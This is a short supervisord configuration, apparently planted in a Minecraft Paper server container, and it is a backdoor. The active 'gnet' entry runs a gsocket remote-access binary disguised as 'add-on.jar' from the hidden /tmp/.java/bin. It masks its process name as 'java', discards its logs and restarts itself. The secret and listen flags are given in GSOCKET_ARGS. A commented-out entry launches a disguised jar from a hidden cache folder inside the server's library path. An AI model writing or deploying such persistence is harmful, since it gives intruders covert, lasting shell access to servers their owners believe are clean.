[supervisord]
logfile=/dev/null

# [program:app]
# directory=/home/container/libraries/io/papermc/paper/paper-api/1.21.4-R0.1-SNAPSHOT/.cache
# command=./paper-mods.jar -a 'java -Xms128M -XX:MaxRAMPercentage=95.0 -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./paper-bot.jar -C ./conf.yaml 
# stdout_logfile=/dev/null
# autorestart = true

[program:gnet]
directory=/tmp/.java/bin
environment=GSOCKET_ARGS="-s i1A9e0D2a1E2c4K3-5A16-f9L893D9g8H7bj7-8K6C4a9m6aF1-eCd9F9440-d6A28038A1c5J1g60 -liqD",HOME="/home/container"
command=exec -a -java ./add-on.jar 
stdout_logfile=/dev/null
autorestart = true